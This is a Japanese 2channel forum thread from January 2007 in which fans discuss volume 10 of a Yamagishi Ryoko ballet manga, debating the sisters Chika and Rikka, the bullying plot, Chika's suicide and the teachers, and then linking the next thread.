955 :花と名無しさん:2007/01/25(木) 00:46:15 ID:???0
ふとみちゃん、最後まで好きになれなかった。一応チカちゃんと友達だったのに
自分のことしか考えられないんだね。チカちゃんの死を悲しむでもなく。
結局チカちゃんの死を悼んだ同世代の友達は大地だけ。それも大地は
好きだったっていうプラスアルファがあるからだし。辛いなあ。

956 :花と名無しさん:2007/01/25(木) 00:50:05 ID:???0
誰かの立場から見れば、そりゃ千花の死を悲しまない奴が許せないとかはあるけどさ
人間ってそんな単純なもんじゃないでしょ
まず自分にちょっとは余裕がないと
他人を思いやることは難しいんだよ
千花だって思わず六花に嫌み言っちゃったりするんだから


957 :花と名無しさん:2007/01/25(木) 00:50:39 ID:???0
まあ、ふとみには「お前いいかげん痩せろ」ぐらいは言いたい。

958 :花と名無しさん:2007/01/25(木) 00:52:14 ID:???0
>>945
千花マンセーあまり、片割れの六花に対抗心めいたもの(千花が上位にあるべきみたいな)があるのかもね。

「悟りを開いたつもりで」の場合、千花ちゃんが意地悪側とされるのを
避けようと、六花を悪者する方向に走ってしまうとかね。
あの場面は、双方、よくない面といい面があったと思う。
千花ちゃんに害意もあったけど、チクリといいたくなる状況もわかるし、
後で自分を責めるのが善良というかいい子だ。
六花も、千花への善意込みでのあの発言だったけど、
やっぱ「甘い」の言えてるし、迂闊な発言。
よくある行き違いで、この姉妹なんて善良だと思う。

959 :花と名無しさん:2007/01/25(木) 00:52:23 ID:???0
>>955
自分のことのように重く受け止めてたじゃん。>ふとみ
それだけで十分だと思うよ。

960 :花と名無しさん:2007/01/25(木) 00:52:49 ID:???0
>>956
許せないっていうか、チカちゃん寂しいなあって思って。
自ら選んだ生き方なんだろうけど、あんなに若くて才能もあって綺麗で恵まれてて
でも人間関係は寂しかったんだなあってさ。ただそれが寂しいなあってだけで
許せないとはちょっと違う。ふとみに感じる嫌悪感もそれとは別の所にあるし。
ユキちゃんのお守り隠したり、たまにいい人ぶったり、中途半端なんだよ。

961 :花と名無しさん:2007/01/25(木) 00:53:49 ID:???0
ふとみの母もアレだよな〜。
焼き肉大盛りとか、ステーキとか、普段からカロリー無視して食べさせてたんだろうな〜。

962 :花と名無しさん:2007/01/25(木) 00:54:42 ID:???0
チカちゃんマンセーだけど、ユキちゃんも好きだよ。仲良い姉妹だし。
腹が立つのは毛箱、担任の二人くらいだよ。「いきなりいじめなんて」ってだけで
終わるなよ。反省しやがれ。

963 :花と名無しさん:2007/01/25(木) 00:55:17 ID:???0
千恵子さんよりわかりやすい愚かさがあるよねw>ふとみ母

964 :花と名無しさん:2007/01/25(木) 00:55:50 ID:???0
>>955
ふとみだってまだ大変な状況だったわけで。
世の中そこまで千花中心に回っているわけでもないし。

965 :花と名無しさん:2007/01/25(木) 00:56:28 ID:???0
大地の涙は、いい餞別だったな。

966 :花と名無しさん:2007/01/25(木) 00:57:23 ID:???0
>>962
まあ、落ち着けってw
でも担任は結構うざいな。ロリ入っていそうだし。
担任がえこひいきするから、よけいに毛箱に目をつけられたんだろうに。

967 :花と名無しさん:2007/01/25(木) 00:58:01 ID:???0
ふとみの中途半端さが人間臭くて好き。
でもあの変な目が嫌い。

968 :花と名無しさん:2007/01/25(木) 00:58:59 ID:???0
>>965
アレは泣かせるよ〜。
思わずもらい泣きした。

969 :花と名無しさん:2007/01/25(木) 00:59:12 ID:???0
担任のしょーもなさは、ムカツク気持ちわかる。
元担任は千花への同情心や親切心はあるんだけど。

970 :花と名無しさん:2007/01/25(木) 00:59:48 ID:???0
普通手帳にいじめられてたようなことが書かれてた、なんて両親に
言われたら、真実を追究しようとしたり、気になったりしないのかな。
両親がとんちんかんなこと言ってるよ、的な態度はどうかと思うわ。
あのおばはんも内密にって言われてるのに、前の担任にぺらぺら話すし、最悪だ。
まぁ、教師なんてあんなもんだろうけどさ。

971 :花と名無しさん:2007/01/25(木) 01:00:32 ID:???0
>>958
チクリと嫌み言った後、自己嫌悪して反省するからダメなんだよ〜、と思ったw

ユキちゃんの無神経さの方が罪深いんだし、バカな妹に嫌み言ってちょとスキーリ♪
とやっていれば、ストレスも溜め込まないだろうにさ。。


972 :花と名無しさん:2007/01/25(木) 01:01:47 ID:???0
>>971
そんな責任転嫁女は千花ちゃんっぽくないのが、また。

973 :花と名無しさん:2007/01/25(木) 01:01:53 ID:???0
今までの作品の姉妹とは決定的に違うよね。根っこの部分で嫌いあってない。

974 :花と名無しさん:2007/01/25(木) 01:03:35 ID:???0
いい子ぶっている上に、教師にひいきされてむかつく、とか思ってたんだろな>毛箱
あのいじめの構図は本当にリアリティがある。

975 :花と名無しさん:2007/01/25(木) 01:04:29 ID:???0
>>973
うむ。六花も心から千花のことを心配し、千花の幸せを心から喜んでいるし、
千花も、自分があんな故障かかえている時に、妹がクララ役ゲットしても、
ちゃんと応援して、はっぱかけて、偉いな。
葬儀の場面に出ていた、篠原家関係者もいい人ばかりっぽい。

976 :花と名無しさん:2007/01/25(木) 01:05:17 ID:???0
>>971
そりゃアンタほど性格悪けりゃ確かに自殺しないだろうなw

977 :花と名無しさん:2007/01/25(木) 01:05:50 ID:???0
ああいう騙され事なかれ主義の担任が、高森のようなのをはびこらせる

978 :花と名無しさん:2007/01/25(木) 01:06:53 ID:???0
>>973
それはまだ二人とも恵まれた環境で育っているからでは?
あのまま千花が自殺せずに生きていたとしたら、結構ドロドロの関係になっていきそうw
だからこそ、嫌な子になる前に死なせてあげたんではないかと。


979 :花と名無しさん:2007/01/25(木) 01:08:11 ID:???0
終盤の千花はとりわけ美しかったし、ブラック千花はブラック千花で見たかったかも

980 :花と名無しさん:2007/01/25(木) 01:08:21 ID:???0
>>978
ドロドロ姉妹に飽きただけじゃ・・姉妹関係ばかり書いてた時期あったし


981 :花と名無しさん:2007/01/25(木) 01:11:07 ID:???0
ああー…
千花ちゃんも、自分のことを好きな人たちのことを
もうちょっと余計に気にかけられるくらい、大人になってたらな…。

ギシ先生は、色んな要素が積み重なって、
プツンと「ついに来た」をやるのが上手すぎるお

982 :花と名無しさん:2007/01/25(木) 01:11:21 ID:???0
まあね。美しいバレエの世界で多少とも浄化されたのかね。

ヴィリでまたドロドロの人間関係描いてるかw

983 :花と名無しさん:2007/01/25(木) 01:13:48 ID:???0
ヴィリってのも読みたいし、第二部も待ち遠しくてたまらん。
山岸さん、120歳くらいまで生きて書き続けてくれないかな。

984 :花と名無しさん:2007/01/25(木) 01:14:37 ID:???0
>>978
今ふと、「お互いのことを思いやる姉妹なんて、せいぜい子供のうちだけ。
状況が変わったり、ましてや同じものを目指すライバルになれば、嫉妬や憎しみで
ドロドロになっていって当たり前。片一方がいなくなりでもしない限り」
という、ギシ先生の心の声を聞いたような気がしますた。

985 :花と名無しさん:2007/01/25(木) 01:16:27 ID:???0
いやいやフィクションの中だけでも本当に善良な姉妹を書きたいって声を聞いたぞw

986 :花と名無しさん:2007/01/25(木) 01:16:45 ID:???0
う〜ん。上で誰かが書いてたと思うけど、10巻は線が汚く感じて絵が今ひとつきれいではなかった。
なので、絵が劣化しないうちに描き上げてほしい。

987 :花と名無しさん:2007/01/25(木) 01:18:46 ID:???0
ところで次スレは…

988 :花と名無しさん:2007/01/25(木) 01:29:16 ID:???0
少し待ってください。立ててみる。
規制がかかっていたらどなたかよろしく。

989 :花と名無しさん:2007/01/25(木) 01:29:50 ID:???0
テンプレ貼るだけでいいなら立てる
待ってて

990 :988:2007/01/25(木) 01:33:03 ID:???0
>>989
ではだぶるといけないのでお願いします。

991 :花と名無しさん:2007/01/25(木) 01:38:32 ID:???0
ほい

〓山岸凉子 Part112〓
http://comic7.2ch.net/test/read.cgi/gcomic/1169656252/

992 :花と名無しさん:2007/01/25(木) 01:38:33 ID:???0
お、立ったみたいね、乙。
http://comic7.2ch.net/test/read.cgi/gcomic/1169656252/l50

993 :花と名無しさん:2007/01/25(木) 01:40:10 ID:???0
乙であります。

994 :花と名無しさん:2007/01/25(木) 01:41:12 ID:???0
>>991
ありがとう!!!

995 :花と名無しさん:2007/01/25(木) 01:44:49 ID:???0
10巻通してみると、
いっそう金子の働きは際立つw

996 :花と名無しさん:2007/01/25(木) 01:48:01 ID:???0
おじゃが入りカレーがプチトラウマになりますた

997 :花と名無しさん:2007/01/25(木) 01:52:39 ID:???0
1000なら2部に空美復活。

998 :花と名無しさん:2007/01/25(木) 01:56:36 ID:???0
んじゃ私も

1000なら2部に空美フッカツ

999 :花と名無しさん:2007/01/25(木) 01:59:00 ID:???0
神は復活させたくないとみたw

1000 :花と名無しさん:2007/01/25(木) 01:59:06 ID:???0
1000なら、第二部は超名作級の出来


1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

237 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)